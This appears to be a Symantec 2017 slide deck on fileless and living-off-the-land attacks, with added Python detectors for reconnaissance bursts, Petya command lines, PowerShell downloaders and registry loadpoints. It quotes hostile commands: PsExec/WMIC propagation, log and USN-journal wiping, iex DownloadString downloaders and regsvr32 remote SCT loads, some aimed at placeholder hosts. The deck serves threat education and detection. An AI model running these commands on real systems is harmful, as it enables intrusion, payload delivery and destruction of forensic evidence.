Living off the land tactics, fileless attacks & dual-use tools

Living off the land and fileless attack techniques


Copyright © 2017 Symantec Corporation

Living off the land

Definition: Living off the land

Only pre-installed software is used by the attacker, and no additional binary executables are installed onto the system.

Living off the land

Attackers are using what’s already available to attack you:

o Fewer new files on disk → more difficult to detect the attack
o Use of off-the-shelf tools & cloud services → difficult to determine intent & source
o These tools are ubiquitous → hide in plain sight
o Finding exploitable zero-day vulnerabilities is getting more difficult → use simple and proven methods such as email & social engineering

«Fileless» attacks

Multiple fileless methods are possible; not all are truly fileless:

MEMORY ONLY ATTACKS: e.g. remote code exploits such as EternalBlue and CodeRed
FILELESS LOADPOINT: hiding scripts in the registry, WMI or GPO, e.g. Poweliks and Kotver
NON-PE FILES: documents with macros, PDFs with JavaScript, and scripts (VBS, JavaScript, PowerShell, …)
DUAL-USE TOOLS: using benign tools, such as PsExec, to do malicious things

Living off the land attack chain

1. INCURSION
   o Exploit in memory, e.g. SMB EternalBlue
   o Email with non-PE file, e.g. document macro
   o Weak or stolen credentials, e.g. RDP password guess
   o Remote script dropper, e.g. LNK with PowerShell from cloud

2. PERSISTENCE
   o Non-persistent: memory only malware, e.g. SQL Slammer
   o Persistent: fileless persistence loadpoint, e.g. JScript in registry
   o Persistent: regular non-fileless method

3. PAYLOAD
   o Regular non-fileless payload
   o Non-PE file payload, e.g. PowerShell script
   o Memory only payload, e.g. Mirai DDoS
   o Dual-use tools, e.g. netsh or PsExec.exe

Section 1: Memory only attacks

Memory only attacks

Run malicious code only in memory; no files are written to disk:

o Mainly remote code execution (RCE) exploits, like EternalBlue
o CodeRed in 2001 was the first widespread outbreak of this type
o A computer restart will clean/disinfect
o PowerShell can be used to load and execute a payload in memory

Attackers do not always need persistence:

o Mirai bot – re-infects the device through a restart if it gets cleaned
o Targeted attack groups – core systems do not get restarted often

Section 2: Dual-use tools

Dual-use tools

System tools and clean applications used for nefarious purposes. Some tools are pre-installed, some are downloaded by the attacker.

Type of internal activity | Purpose | Dual-use tools
Internal network reconnaissance | Enumerate information about a target environment | net user, systeminfo, whoami, hostname, quser, ipconfig
Credential harvesting | Obtain legitimate user credentials to gain access to target systems for malicious purposes | Mimikatz, WCE, pwdump
Lateral movement | Gain deeper access into the target network | PsExec, PowerShell, WMI, RDP
Data exfiltration | Send data back to attackers | FTP, RAR, ZIP, iExplorer, PuTTY, PowerShell, rdpclip
Fallback backdoor | Enables a backdoor that can be used should the main backdoor be removed | net user, RDP, Telnet server

Information gathering

o Many attack groups use common system tools during their attacks

WATERBUG/TURLA
• systeminfo
• net view
• net view /domain
• tasklist /v
• gpresult /z
• arp -a
• net share
• net use
• net user administrator
• net user /domain
• net user administrator /domain
• tasklist /fi

APPLEWORM/LAZARUS
• hostname
• whoami
• ver
• ipconfig -all
• ping www.google.com
• query user
• net user
• net view
• net view /domain
• tasklist /svc
• netstat -ano | find "TCP"
• msdtc [IP] [port]

BILLBUG
• net user
• ipconfig /all
• net start
• systeminfo
• gpresult
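The command lists above are what a reconnaissance phase looks like in process-creation telemetry, and that sequence is the detection opportunity. The following is an added example in Python, not Symantec's code: it turns the slide's commands into a watch list and alerts when one host/user pair runs several distinct reconnaissance commands inside a short window. The window, the threshold and the sample events are assumptions made for this example.

```python
"""Flag bursts of reconnaissance commands per host and user.

Added example for this deck, not Symantec code. The watch list is built from the
information-gathering commands attributed to Waterbug, Appleworm and Billbug on
the slide; window, threshold and sample telemetry are assumptions.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Canonical form: program name without path or .exe, plus the sub-command for
# "net" and "query" so that "net view /domain" and "net view" are the same key.
RECON_COMMANDS = {
    "systeminfo", "net view", "net user", "net share", "net use", "net start",
    "tasklist", "gpresult", "arp", "hostname", "whoami", "ver", "ipconfig",
    "query user", "quser", "netstat",
}
WINDOW = timedelta(minutes=10)   # assumed tuning values; adjust to the environment
THRESHOLD = 5                    # distinct recon commands within WINDOW


def canonical(cmdline):
    """Reduce a command line to its watch-list key, or None if it is not recon."""
    tokens = cmdline.strip().split()
    if not tokens:
        return None
    head = tokens[0].rsplit("\\", 1)[-1].lower()        # strip any path prefix
    if head.endswith(".exe"):
        head = head[:-4]
    if head in ("net", "query") and len(tokens) > 1:   # "net view /domain" -> "net view"
        head = f"{head} {tokens[1].lower()}"
    return head if head in RECON_COMMANDS else None


def detect_recon_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """events: iterable of (timestamp, host, user, command line).

    Returns one alert per (host, user) the first time it runs `threshold`
    distinct recon commands inside `window`, as
    (host, user, window start, sorted command keys).
    """
    recent = defaultdict(deque)            # (host, user) -> deque of (ts, key)
    alerted, alerts = set(), []
    for ts, host, user, cmdline in sorted(events):
        key_name = canonical(cmdline)
        if key_name is None:
            continue
        pair = (host, user)
        q = recent[pair]
        q.append((ts, key_name))
        while q and ts - q[0][0] > window:   # drop entries older than the window
            q.popleft()
        distinct = {name for _, name in q}
        if len(distinct) >= threshold and pair not in alerted:
            alerted.add(pair)
            alerts.append((host, user, q[0][0], sorted(distinct)))
    return alerts


# Constructed sample telemetry (not real data). WS07 shows a sequence like the
# ones on the slide; WS02 is an administrator running single commands hours apart.
T0 = datetime(2017, 9, 14, 10, 0, 0)
SAMPLE_EVENTS = [
    (T0 + timedelta(minutes=0), "WS07", r"CORP\alice", "systeminfo"),
    (T0 + timedelta(minutes=1), "WS07", r"CORP\alice", r"C:\Windows\System32\whoami.exe"),
    (T0 + timedelta(minutes=2), "WS07", r"CORP\alice", "net view /domain"),
    (T0 + timedelta(minutes=3), "WS07", r"CORP\alice", "ipconfig /all"),
    (T0 + timedelta(minutes=4), "WS07", r"CORP\alice", "tasklist /v"),
    (T0 + timedelta(minutes=5), "WS07", r"CORP\alice", "net user administrator /domain"),
    (T0 - timedelta(hours=1), "WS02", r"CORP\bob", "ipconfig /all"),
    (T0 + timedelta(hours=1), "WS02", r"CORP\bob", "whoami"),
    (T0 + timedelta(hours=2), "WS02", r"CORP\bob", "ping www.google.com"),
]

if __name__ == "__main__":
    for host, user, start, cmds in detect_recon_bursts(SAMPLE_EVENTS):
        print(f"{host} {user}: {len(cmds)} distinct recon commands since "
              f"{start:%H:%M}: {', '.join(cmds)}")
```

The detector keys on distinct commands rather than raw counts so that an administrator repeating `ipconfig` does not trip it, while the mixed `systeminfo`/`whoami`/`net view`/`tasklist` run typical of the groups above does. Feed it real Sysmon Event ID 1 or Windows 4688 records by mapping them onto the same four-tuple.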

Targeted attacks & dual-use tools

Group name | Reconnaissance | Credential harvesting | Lateral movement | Custom built tools
Tick | whoami, procdump, VBS | WCE, Mimikatz, gsecdump | PsExec | Yes
Waterbug | systeminfo, net, tasklist, gpresult, … | WCE, pwdump | Open shares | Yes
Suckfly | tcpscan, smbscan | WCE, gsecdump, credentialdumper | - | Yes
Fritillary | PowerShell, sdelete | Mimikatz, PowerShell | PsExec | Yes
Destroyer | Disk usage, event log viewer | kerberos manipulator | PsExec, curl, VNC | Yes
Chafer | network scanner, SMB bruteforcer | WCE, Mimikatz, gsecdump, … | PsExec | Yes
Greenbug | Broutlook | WCE, gsecdump, browdump, … | TeamViewer, PuTTY | Yes
Buckeye | os info, user info, smb enumerator, … | pwdump, Lazagne, chromedump, … | Open shares | Yes
Billbug | ver, net, gpresult, systeminfo, ipconfig, … | - | custom backdoor | Yes
Appleworm | net, netsh, query, telnet, find, … | dumping SAM | RDP bruteforcer, rdclip | Yes

Targeted attack groups

o 10 out of 10 groups analyzed used system tools in combination with custom tools during their attacks
o Application whitelisting often does not protect against such attacks

Examples:

o Petya used PsExec, WMI, and LSAdump for lateral movement
o Calcium/Fin7 group used PowerShell payloads in attacks in 2017
o Attack against the DNC in 2016 used PowerShell for lateral movement and discovery and used a WMI fileless persistence method

Dual-use tools: global usage

o Mimikatz and PsExec are popular for lateral movement, e.g. Petya

Example: Ransom.Petya

Petya uses dual-use tools

o Threat is a DLL executed by rundll32.exe
o Uses a recompiled version of LSADump (Mimikatz) to get passwords
o Uses PsExec to propagate:
  \\[server_name]\admin$\perfc.dat
  psexec rundll32.exe c:\windows\perfc.dat #1 <rand>
o Uses WMI to propagate if PsExec fails:
  wmic.exe /node:[IP Address] /user:[USERNAME] /password:[PASSWORD] process call create "%System%\rundll32.exe \"%Windows%\perfc.dat\" #1 60"
o Scheduled task to restart into the malicious MBR payload:
  schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "%system%\shutdown.exe /r /f" /ST 14:42
o Deletes log files to hide traces:
  wevtutil cl Setup & wevtutil cl System & … & fsutil usn deletejournal /D %C:
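Every command line on the Petya slide is a concrete detection opportunity, and the sequence on one host is stronger evidence than any single line. The following is an added example in Python, not Symantec's code: a small rule set over process-creation command lines (Sysmon Event ID 1 / Windows 4688 style records, simplified to host plus command line) that scores a host by how many of the Petya steps it shows. The rule weights and the sample events are constructed for this example.

```python
"""Rule-based detection of the Petya propagation and anti-forensics command lines.

Added example for this deck, not Symantec code. Input records are a hypothetical
simplification of process-creation telemetry: {"host": ..., "cmd": ...}.
Rule weights and the sample events below are constructed.
"""
import re
from collections import defaultdict

# (rule name, case-insensitive regex over the command line, weight). The patterns
# follow the command lines shown on the slide and tolerate full paths.
RULES = [
    ("wmic_remote_process_create",
     re.compile(r"\bwmic(?:\.exe)?\b.*?/node:.*?\bprocess\s+call\s+create\b", re.I), 3),
    ("psexec_rundll32_ordinal",
     re.compile(r"\bpsexec(?:\.exe)?\b.*?\brundll32(?:\.exe)?\b.*?\.dat\s*#1\b", re.I), 3),
    ("rundll32_perfc_dat",
     re.compile(r"\brundll32(?:\.exe)?\b.*?\bperfc\.dat\b", re.I), 4),
    ("schtasks_forced_reboot",
     re.compile(r"\bschtasks(?:\.exe)?\b.*?/create\b.*?\bshutdown(?:\.exe)?\b.*?/r\b", re.I), 2),
    ("wevtutil_clear_log",
     re.compile(r"\bwevtutil(?:\.exe)?\s+cl\s+\w+", re.I), 2),
    ("fsutil_delete_usn_journal",
     re.compile(r"\bfsutil(?:\.exe)?\s+usn\s+deletejournal\b", re.I), 2),
]
WEIGHTS = {name: weight for name, _, weight in RULES}


def classify_event(cmdline):
    """Names of every rule that matches one command line."""
    return [name for name, rx, _ in RULES if rx.search(cmdline)]


def detect(events):
    """Aggregate rule hits per host.

    Returns {host: {"rules": set_of_rule_names, "score": int}} for hosts with
    at least one hit. A single hit deserves a look; several distinct hits on
    one host is the Petya pattern: remote execution, forced reboot, log wiping.
    """
    hits = defaultdict(set)
    for event in events:
        for name in classify_event(event["cmd"]):
            hits[event["host"]].add(name)
    return {host: {"rules": rules, "score": sum(WEIGHTS[n] for n in rules)}
            for host, rules in hits.items()}


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # WS01: the Petya sequence as described on the slide
    {"host": "WS01", "cmd": r'wmic.exe /node:10.0.0.7 /user:CORP\jdoe /password:[REDACTED] '
                            r'process call create "C:\Windows\System32\rundll32.exe \"C:\Windows\perfc.dat\" #1 60"'},
    {"host": "WS01", "cmd": r"psexec.exe \\10.0.0.8 rundll32.exe C:\Windows\perfc.dat #1 30"},
    {"host": "WS01", "cmd": r'schtasks /RU "SYSTEM" /Create /SC once /TN "" /TR "C:\Windows\System32\shutdown.exe /r /f" /ST 14:42'},
    {"host": "WS01", "cmd": r"cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & fsutil usn deletejournal /D C:"},
    # WS02: ordinary administrator activity that must not alert
    {"host": "WS02", "cmd": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL hotplug.dll"},
    {"host": "WS02", "cmd": r"schtasks /Query /FO LIST /V"},
]

if __name__ == "__main__":
    for host, result in detect(SAMPLE_EVENTS).items():
        print(f"{host}: score {result['score']} ({', '.join(sorted(result['rules']))})")
```

The `wevtutil cl` and `fsutil usn deletejournal` rules are worth alerting on alone, regardless of Petya: clearing event logs and the USN journal is exactly the anti-forensics step that destroys the evidence the other rules depend on, so forward logs off-host before relying on them.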

Example: Odinaff group

The Odinaff group used multiple dual-use tools in their attack:

o Mimikatz: an open source password recovery tool
o PsExec: a process execution tool from Microsoft
o Netscan: a network scanning tool
o Ammyy Admin: a remote access tool
o Gussdoor: a custom remote backdoor (Backdoor.Gussdoor)
o RunAs: a tool for running processes as another user
o PowerShell: various commands used

WMI usage in malware

o On average 2% of malware in our sandbox misused WMI

Usage of dual-use tools: January 2017

Tool | Usage (%)
sc.exe | 2.7190%
vnc | 2.1176%
net.exe | 1.2733%
powershell.exe | 1.0263%
ipconfig.exe | 0.8227%
netsh.exe | 0.7526%
teamviewer.exe | 0.6224%
tasklist.exe | 0.4963%
rdpclip.exe | 0.3226%
rar.exe | 0.3139%
wmic.exe | 0.3027%
find.exe | 0.2767%
curl.exe | 0.2027%
netstat.exe | 0.1938%
systeminfo.exe | 0.1641%
wget.exe | 0.1208%
nc.exe | 0.1174%
gpresult.exe | 0.1147%
whoami.exe | 0.1109%
ammyy.exe | 0.1061%

o System tools are popular with administrators and cyber criminals
o Remote administration tools are often misused by attackers

Usage of dual-use tools

o PowerShell is still gaining popularity with attackers

Section 3: Non-PE files (PE = Portable Executables)

Malicious documents still popular

o Malicious macro with social engineering
o Embedded binary can be double clicked

Non-PE files

o Scripts are very popular, especially PowerShell
o Many script toolkits are available
o Scripts are easy to obfuscate and difficult to detect with signatures
o Scripts are flexible and can be quickly adapted if needed

Example PowerShell downloader:

powershell.exe -nop -ep Bypass -noexit -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true}; iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))
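The downloader above shows why matching the raw command line is fragile: the switches are abbreviated, and the same script can be passed through -EncodedCommand instead of -c, which hides every keyword as Base64. The following added example (Python, not Symantec's code) canonicalises powershell.exe switches, decodes -EncodedCommand, and only then looks for downloader indicators in the script text. The switch table approximates powershell.exe's prefix matching and is an assumption; apart from the slide's own downloader, the sample command lines are constructed.

```python
"""Normalise powershell.exe command lines before matching downloader indicators.

Added example for this deck, not Symantec code. The SWITCHES table is an
approximation of powershell.exe's prefix matching (any prefix at least as long
as the listed shortest form is accepted); sample command lines other than the
slide's downloader are constructed.
"""
import base64
import binascii
import re

# (canonical switch, shortest accepted prefix), checked in this order.
# "ep" and "ec" are explicit aliases of ExecutionPolicy and EncodedCommand.
SWITCHES = [
    ("executionpolicy", "ex"), ("ep", "ep"),
    ("encodedcommand", "e"), ("ec", "ec"),
    ("noprofile", "nop"), ("noexit", "noe"), ("nologo", "nol"),
    ("noninteractive", "noni"), ("windowstyle", "w"), ("command", "c"),
    ("file", "f"), ("version", "v"),
]
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
VALUE_SWITCHES = {"executionpolicy", "windowstyle", "encodedcommand", "file", "version"}
TOKEN = re.compile(r'"[^"]*"|\S+')

INDICATORS = [
    ("downloader", re.compile(r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)),
    ("invoke_expression", re.compile(r"invoke-expression|\biex\b", re.I)),
    ("cert_validation_disabled", re.compile(r"servercertificatevalidationcallback", re.I)),
    ("in_memory_load", re.compile(r"\[reflection\.assembly\]::load|frombase64string", re.I)),
]


def resolve_switch(token):
    """'-nop' -> 'noprofile', '/ep' -> 'executionpolicy', '-e' -> 'encodedcommand'."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    key = token[1:].lower()
    for full, shortest in SWITCHES:
        if full.startswith(key) and len(key) >= len(shortest):
            return ALIASES.get(full, full)
    return None


def decode_encoded_command(b64):
    """-EncodedCommand payload -> script text ('' if not valid Base64 / UTF-16LE)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return ""


def normalize(cmdline):
    """Return ({canonical switch: value}, script text) for one command line."""
    opts, script = {}, ""
    tokens = list(TOKEN.finditer(cmdline))
    i = 1 if tokens and resolve_switch(tokens[0].group()) is None else 0  # skip program name
    while i < len(tokens):
        name = resolve_switch(tokens[i].group())
        if name is None:                 # bare text: the host treats it as -Command
            script = cmdline[tokens[i].start():]
            break
        if name == "command":            # -Command consumes the rest of the line
            script = cmdline[tokens[i].end():].strip()
            break
        if name in VALUE_SWITCHES and i + 1 < len(tokens):
            opts[name] = tokens[i + 1].group().strip('"')
            i += 2
        else:
            opts[name] = True
            i += 1
    if "encodedcommand" in opts:
        script = decode_encoded_command(opts["encodedcommand"])
    return opts, script


def assess(cmdline):
    """Return (switches, decoded script, indicator names) for a command line."""
    opts, script = normalize(cmdline)
    hits = [name for name, rx in INDICATORS if rx.search(script)]
    if str(opts.get("executionpolicy", "")).lower() in ("bypass", "unrestricted"):
        hits.append("execution_policy_bypass")
    if "encodedcommand" in opts:
        hits.append("encoded_command")
    if str(opts.get("windowstyle", "")).lower() == "hidden":
        hits.append("hidden_window")
    return opts, script, hits


# The slide's downloader, verbatim apart from its already-redacted URL.
SLIDE_DOWNLOADER = (
    "powershell.exe -nop -ep Bypass -noexit -c "
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true}; "
    "iex ((New-Object System.Net.WebClient).DownloadString('[REMOVED]'))"
)
# Constructed: an equivalent downloader hidden behind -EncodedCommand and a hidden window.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    .encode("utf-16-le")).decode("ascii")
ENCODED_DOWNLOADER = f"powershell -w hidden -enc {_ENCODED}"
# Constructed: a benign maintenance task that should produce no indicators.
BENIGN = r'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Scripts\backup.ps1"'

if __name__ == "__main__":
    for line in (SLIDE_DOWNLOADER, ENCODED_DOWNLOADER, BENIGN):
        opts, script, hits = assess(line)
        print(sorted(opts), hits, script[:60])
```

The point of normalising first is that `-enc`, `-e` and `-EncodedCommand` all reach the same code path and the decoded script is what gets inspected; a raw-string rule for `DownloadString` would have seen only Base64 in the second sample. Module Logging and Script Block Logging (Event ID 4104) give the same decoded view from the PowerShell engine itself and are the better source where they can be enabled.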

Common malware use cases for PowerShell

DOWNLOADER: PowerShell script used to download a payload to disk or memory. Often used in email attachments such as WSF or document macros.
LOADPOINT: PowerShell script used as a persistent loadpoint on Windows. Often stored completely in the registry (fileless), e.g. Kotver, or within WMI.
LATERAL MOVEMENT: PowerShell remoting to execute on a remote computer (Invoke-Command). Download and execute Mimikatz, etc. in order to steal credentials.

Email script downloaders

Detections by month for JavaScript and macro downloaders (chart)

Attachment file extensions

o Malicious attachments with HTML code gained popularity in 2017

Prevalence of PowerShell

o 95.4% of the PowerShell scripts submitted to Blue Coat MAA were malicious

Volume of PowerShell samples from customers in our sandbox in 2016 (chart)

TOP 3 THREATS THAT USE POWERSHELL
1. 9.4% W97M.Downloader
2. 4.5% Trojan.Kotver
3. 4.0% JS.Downloader

Section 4: Fileless loadpoints

Fileless loadpoints

There are many ways to have a loadpoint without adding a new file:

o Windows registry
o Windows Management Instrumentation (WMI)
o Group Policy Objects (GPO)
o Scheduled tasks
o …

Script embedded in the registry

Common: Windows registry run key that points to the malware binary file

New trick: Windows registry run key contains a script that will get executed

o This script can load more payloads from other registry keys and run them
o As the script is not in a file on disk, it might be missed by traditional security tools

Example: Poweliks

o Multiple stages in the registry
o Uses JavaScript and PowerShell
o Loads DLL directly into memory
o Decrypted directly in memory
o Uses a non-printable ASCII character to protect its own registry key

Remote SCT load

o Registry run key can also point to a remote SCT file
o Regsvr32 will download and execute the embedded JScript:
  Regsvr32 /s /n /u /i:%REMOTE_MALICIOUS_SCT_SCRIPT% scrobj.dll

Example: Downloader.Dromedan (40,000 detections / day)

o Embedded JScript uses WMI to execute a PowerShell payload
o Script stores an encoded DLL in the registry for later

(Figure: malicious .sct file)
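Both the registry-embedded script of the Poweliks slide and the regsvr32 remote SCT loadpoint above leave a Run value that does not look like a normal "path to an executable". The following added example (Python, not Symantec's code) classifies autorun values by those indicators: a non-printable or empty value name (the Poweliks trick), a script host invoked with inline script, reads of further stages from other registry keys, and regsvr32 pointing at a URL together with scrobj.dll. classify() works on value strings from any source so it runs on an analyst workstation; scan_local_run_keys() is a Windows-only helper that feeds it the live keys through winreg. The sample values, the size threshold and the key list are assumptions for this example.

```python
"""Classify autorun (Run / RunOnce) values for fileless-loadpoint indicators.

Added example for this deck, not Symantec code. classify() takes the value
name and data as strings (exported or collected registry data);
scan_local_run_keys() reads the live keys on Windows. Sample values, the
size threshold and RUN_KEYS are assumptions.
"""
import re

SCRIPT_HOSTS = re.compile(
    r"\b(?:mshta|wscript|cscript|powershell|pwsh|regsvr32|rundll32|cmd)(?:\.exe)?\b", re.I)
INLINE_SCRIPT = re.compile(
    r"javascript:|vbscript:|-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|\biex\b|"
    r"invoke-expression|activexobject|createobject|wscript\.shell", re.I)
REMOTE_SCT = re.compile(
    r"\bregsvr32(?:\.exe)?\b.*?/i:\s*(?:https?|ftp)://.*?\bscrobj\.dll\b", re.I)
REGISTRY_READ = re.compile(
    r"\b(?:hkcu|hklm|hkey_[a-z_]+)\b|get-itemproperty|\bregread\b|registry::", re.I)
NONPRINTABLE = re.compile(r"[\x00-\x1f\x7f]")

RUN_KEYS = [  # standard autorun locations read by scan_local_run_keys()
    ("HKEY_CURRENT_USER", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKEY_CURRENT_USER", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
    ("HKEY_LOCAL_MACHINE", r"Software\Microsoft\Windows\CurrentVersion\Run"),
    ("HKEY_LOCAL_MACHINE", r"Software\Microsoft\Windows\CurrentVersion\RunOnce"),
]


def classify(name, data):
    """Return indicator names for one autorun value (name, data as strings)."""
    hits = []
    if not name.strip() or NONPRINTABLE.search(name):
        hits.append("nonprintable_or_empty_value_name")   # Poweliks-style hidden value
    if REMOTE_SCT.search(data):
        hits.append("regsvr32_remote_sct")                 # .sct fetched from a URL via scrobj.dll
    if SCRIPT_HOSTS.search(data) and INLINE_SCRIPT.search(data):
        hits.append("inline_script_in_run_value")          # script body lives in the registry
    if REGISTRY_READ.search(data):
        hits.append("reads_further_stages_from_registry")  # multi-stage registry payload
    if len(data) > 1024:                                   # assumed threshold
        hits.append("oversized_value")                     # encoded payload stored inline
    return hits


def scan_values(values):
    """values: iterable of (name, data). Returns {name: hits} for suspicious ones."""
    findings = {}
    for name, data in values:
        hits = classify(name, data)
        if hits:
            findings[name] = hits
    return findings


def scan_local_run_keys():
    """Windows only: enumerate RUN_KEYS with winreg and classify every value."""
    import winreg  # only available on Windows, so imported lazily
    findings = []
    for hive_name, path in RUN_KEYS:
        try:
            key = winreg.OpenKey(getattr(winreg, hive_name), path)
        except OSError:
            continue
        with key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:          # no more values in this key
                    break
                index += 1
                hits = classify(name, str(data))
                if hits:
                    findings.append((hive_name, path, name, hits))
    return findings


# Constructed sample values (not from a real system). The "\x01" entry models
# the Poweliks slide; "Service" models the regsvr32 remote SCT loadpoint.
SAMPLE_VALUES = [
    ("Updater", r'"C:\Program Files\Vendor\Updater.exe" /background'),
    ("NvBackend", r"C:\Windows\System32\rundll32.exe C:\Vendor\backend.dll,Start"),
    ("\x01", 'mshta "javascript:eval(new ActiveXObject(\'WScript.Shell\')'
             '.RegRead(\'HKCU\\\\Software\\\\Constructed\\\\stage2\'))"'),
    ("Service", "regsvr32 /s /n /u /i:http://example.invalid/payload.sct scrobj.dll"),
]

if __name__ == "__main__":
    for name, hits in scan_values(SAMPLE_VALUES).items():
        print(repr(name), "->", ", ".join(hits))
```

The benign `rundll32 ... backend.dll,Start` entry is deliberately included: rundll32 alone is not an indicator, it is the combination of a script host with inline script, a registry read, or a remote SCT that separates the loadpoints on these slides from ordinary autoruns. The same classifier can be pointed at Sysmon Event ID 13 (registry value set) records to catch the value at the moment it is written rather than on a periodic scan.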

Fileless loadpoints

Similar trigger methods exist for:

o Windows Management Instrumentation (WMI)
o Group Policy Objects (GPO)
o Scheduled tasks

(Figure: WMI PowerShell backdoor)

Not truly fileless loadpoints

Without additional files, but writing to existing files:

o File infector: infect any file that gets restarted with the PC
o Browser files: infect the core browser files or extensions
o PowerShell profile: add malicious script to the profile file
o Trigger on shutdown: remove itself once started and write a registry run key when system shutdown is called
o BITSadmin: add a malicious update server as backdoor

Detection challenges

o If no file is written to disk → security measures might not work
o Lack of indicators of compromise (IoCs) for sharing
o Common malware does not always use a loadpoint anymore
o Symantec has various detection features in place for such threats

Mitigation & best practices

o Monitor the use of dual-use tools inside your network
o Block remote execution through PsExec and WMI (if applicable)
o Enable better logging and process the information (if applicable)
o Enable advanced account security features, like 2FA and login notification (if applicable)
o Protect against password and credential theft, for example with behavior-based security solutions

Protection solutions

(Diagram spanning Attacker, Organization and Users)

• Deepsight IoC feeds
• MATI custom reports
• Threat Intelligence
• Managed Security Services (MSS)
• Incident Response (IR) on site
• Data Loss Prevention (DLP)
• …

• Proxy SG secure web gateway
• Security Analytics
• Web Security Service
• Data Center Security (DCS)
• Control Compliance Suite (CCS)

Symantec Endpoint Protection (SEP) 14: reputation, machine learning, behavior detection, emulation, exploit mitigation, IPS, …

• Public awareness/white papers
• Law enforcement collaboration
• Infrastructure takedowns
• …

• Email Security.cloud
• MAA Sandbox
• Advanced Threat Protection (ATP)
• …

Symantec: Robust protection against fileless threats

Advanced Antivirus Engine
o Symantec uses an array of detection engines including an advanced signature-based antivirus engine with heuristics, just-in-time (JIT) memory scanning, an emulator and advanced machine-learning engines. This allows for the detection of fileless threats executed directly in memory.

SONAR Behavior Engine
o SONAR is Symantec’s real-time behavior-based protection that blocks potentially malicious applications from running on the computer. It detects malware without requiring any specific detection signatures. SONAR uses heuristics, reputation data, and behavioral policies to detect emerging and unknown threats.

Email Protection
o Email-filtering services such as Symantec Email Security.cloud can block malicious emails before they reach users. Symantec Messaging Gateway’s Disarm Technology can also protect by removing malicious content before it even reaches the user.

Malware Analysis Sandbox
o Sandboxes such as Blue Coat Malware Analysis have the capability to analyze and block malicious scripts, including PowerShell scripts. The technology can overcome multiple layers of obfuscation to detect deeply hidden suspicious behavior.

Network Protection
o Symantec’s Secure Web Gateway and the IPS and firewall on the endpoint can monitor and block malicious traffic entering or leaving a system and can help minimize the impact of attacks. Suspicious content can be automatically analyzed in sandboxes.

System Hardening
o Symantec’s system hardening solution, Symantec Data Center Security, can secure physical and virtual servers, and monitor the compliance posture of server systems for on-premise, public, and private cloud data centers. By defining allowed behavior, Symantec Data Center Security can limit the use of scripts and any of their actions.

Visibility and Services
o Symantec’s Managed Security Services can help with threat intelligence, with proactive threat hunting, as well as incident response handling.

Conclusion

o Nearly all targeted attack groups use system tools in their attacks
o Sandboxes are often not able to handle fileless attacks properly
o Fileless attacks are difficult to detect as they leave fewer traces
o Application whitelisting will not protect against all living off the land tactics
o Script attacks, especially PowerShell, are increasing

Further reading

o BLOG: Attackers are increasingly living off the land
o WHITEPAPER: Living off the land and fileless attack techniques

Thank you